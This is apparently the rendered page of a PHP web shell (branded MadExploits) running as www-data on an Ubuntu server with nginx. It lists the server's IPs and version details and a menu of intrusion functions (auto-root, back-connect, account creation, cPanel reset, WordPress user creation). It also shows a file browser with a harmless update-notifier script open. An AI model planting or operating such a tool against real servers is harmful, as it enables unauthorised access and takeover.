Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
update-notifier /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
drwxr-xr-x
upgrader-patches
[ DIR ]
drwxr-xr-x
notify-reboot-required
1.51
KB
-rwxr-xr-x
notify-updates-outdated
519
B
-rwxr-xr-x
package-data-downloads-failed
37.77
KB
-rw-r--r--
package-data-downloads-failed-...
43.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notify-updates-outdated
#!/bin/sh # we do not include ". gettext.sh" here because: # a) it breaks if its not available # b) the string we have here does not need it (because it has no vars) eval_gettext() { if [ -x /usr/bin/gettext ]; then echo $(gettext "$1") else echo "$1" fi } export TEXTDOMAIN=update-notifier export TEXTDOMAINDIR=/usr/share/locale # Print the message echo "" eval_gettext "The list of available updates is more than a week old." eval_gettext "To check for new updates run: sudo apt update"
Close